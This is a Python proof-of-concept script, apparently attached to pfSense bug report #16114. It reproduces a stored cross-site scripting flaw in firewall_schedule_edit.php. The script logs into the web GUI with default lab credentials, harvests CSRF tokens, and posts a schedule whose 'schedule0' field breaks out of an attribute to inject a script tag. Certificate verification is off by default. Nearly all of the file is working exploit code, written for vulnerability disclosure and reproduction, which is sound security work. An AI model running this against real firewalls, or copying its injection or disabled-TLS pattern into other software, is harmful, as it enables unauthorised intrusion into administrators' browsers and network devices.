Bug #16114 » poc-xss-fwsched-16114.py

Jim Pingle, 04/01/2025 04:47 PM

 
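#!/usr/bin/env python3
"""Proof of concept for the XSS in firewall_schedule_edit.php (pfSense bug #16114).

Logs into the pfSense web GUI with a normal authenticated session, collects the
per-page ``__csrf_magic`` tokens the GUI requires, and submits a schedule whose
``schedule0`` field carries an HTML/JavaScript payload.  If that field is
echoed back without escaping (the bug), the payload runs in the admin's
browser.  Everything else in the form is a valid schedule so the request
passes the page's input validation.

Run this only against a lab instance you are authorized to test:

* TLS certificate verification is disabled (pfSense ships a self-signed
  certificate), so the admin credentials are exposed to anyone able to
  intercept the connection.  Set ``PFSENSE_CA_BUNDLE`` to a CA file to keep
  verification on instead.
* The payload is written into the firewall configuration; remove the
  ``XSS_Test_Sched`` schedule afterwards.

Connection details are taken from the environment so that no real credentials
have to be edited into this file (the defaults are the lab values used when
the bug was reported):

    PFSENSE_URL        base URL of the GUI   (default https://198.51.100.34)
    PFSENSE_USER       GUI username          (default admin)
    PFSENSE_PASSWORD   GUI password          (default pfsense2)
    PFSENSE_CA_BUNDLE  optional CA file; when unset, certificate checks are off
"""
import os
import sys

import requests
from bs4 import BeautifulSoup

# Certificate verification is switched off below on purpose (self-signed lab
# certificate); drop the per-request InsecureRequestWarning so the PoC output
# stays readable.
requests.packages.urllib3.disable_warnings()

baseurl = os.environ.get('PFSENSE_URL', 'https://198.51.100.34').rstrip('/')

target = baseurl + '/firewall_schedule_edit.php'

login_data = {
    'login'        : 'Login',
    'usernamefld'  : os.environ.get('PFSENSE_USER', 'admin'),
    'passwordfld'  : os.environ.get('PFSENSE_PASSWORD', 'pfsense2'),
}

# Form fields of firewall_schedule_edit.php.  ``schedule0`` first closes the
# attribute it is echoed into and then injects a <script> element; the other
# fields describe a syntactically valid schedule so the save is accepted.
target_data = {
    "name": "XSS_Test_Sched",
    "descr": "XSS Test",
    "monthsel": "3",
    "starttimehour": "0",
    "starttimemin": "00",
    "stoptimehour": "23",
    "stoptimemin": "59",
    "timerangedescr": "XSS 1",
    "tempFriendlyTime0": "Sun",
    "starttime0": "0:00",
    "stoptime0": "23:59",
    "timedescr0": "XSS 2",
    "schedule0": "w11p3-m3d12\"><script>alert('XSS')</script>",
    "marker": "",
    "save": "Save"
}

headers = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0'}


def csrf_token(html: str) -> str:
    """Return the value of the ``__csrf_magic`` hidden field in a GUI page.

    pfSense issues a fresh token per page, so this is called once for the
    login form and again for the page shown after login.

    Raises:
        RuntimeError: if the page carries no token (for example a non-GUI
            error page), with a readable message instead of the ``TypeError``
            that indexing a ``None`` lookup result would raise.
    """
    field = BeautifulSoup(html, 'lxml').find('input', attrs={'name': '__csrf_magic'})
    if field is None or not field.get('value'):
        raise RuntimeError('no __csrf_magic token found in response from ' + baseurl)
    return field['value']


def input_errors(html: str) -> list[str]:
    """Return the validation messages pfSense renders under ``div.input-errors``."""
    soup = BeautifulSoup(html, 'lxml')
    return [item.text for item in soup.select('div.input-errors ul li')]


def main() -> int:
    """Log in, submit the payload and report the outcome.

    Returns:
        0 when the schedule was accepted, 1 when the GUI reported input
        errors or the login looks rejected.  Network and HTTP failures
        propagate as ``requests`` exceptions.
    """
    with requests.Session() as session:
        # Session-wide settings: the original passed verify=False only on the
        # first GET, so the two POSTs would have failed against the default
        # self-signed certificate.
        session.verify = os.environ.get('PFSENSE_CA_BUNDLE') or False
        session.headers.update(headers)

        # Fetch CSRF token from login page
        resp = session.get(baseurl)
        resp.raise_for_status()
        login_data['__csrf_magic'] = csrf_token(resp.text)

        # Login
        resp = session.post(baseurl, data=login_data)
        resp.raise_for_status()
        # NOTE(review): assumes a rejected login re-renders the login form,
        # which is where the ``usernamefld`` input lives -- confirm against
        # the GUI; only a warning so a wrong assumption cannot hide a result.
        if 'usernamefld' in resp.text:
            print('Warning: login page shown again; check PFSENSE_USER / PFSENSE_PASSWORD',
                  file=sys.stderr)

        # Find the next CSRF token (tokens are per page, the login one is spent)
        target_data['__csrf_magic'] = csrf_token(resp.text)

        # Submit actual request
        resp = session.post(target, data=target_data)
        resp.raise_for_status()

        # Dump input errors from response
        errors = input_errors(resp.text)
        if errors:
            print("Input errors:\n")
            for ie in errors:
                print("* " + ie + "\n")
            return 1

        # Where the request ended up tells the operator whether the save was
        # accepted (pfSense redirects on success) without guessing the page.
        print('Final response: HTTP ' + str(resp.status_code) + ' ' + resp.url)

    print('Done')
    return 0


if __name__ == "__main__":
    sys.exit(main())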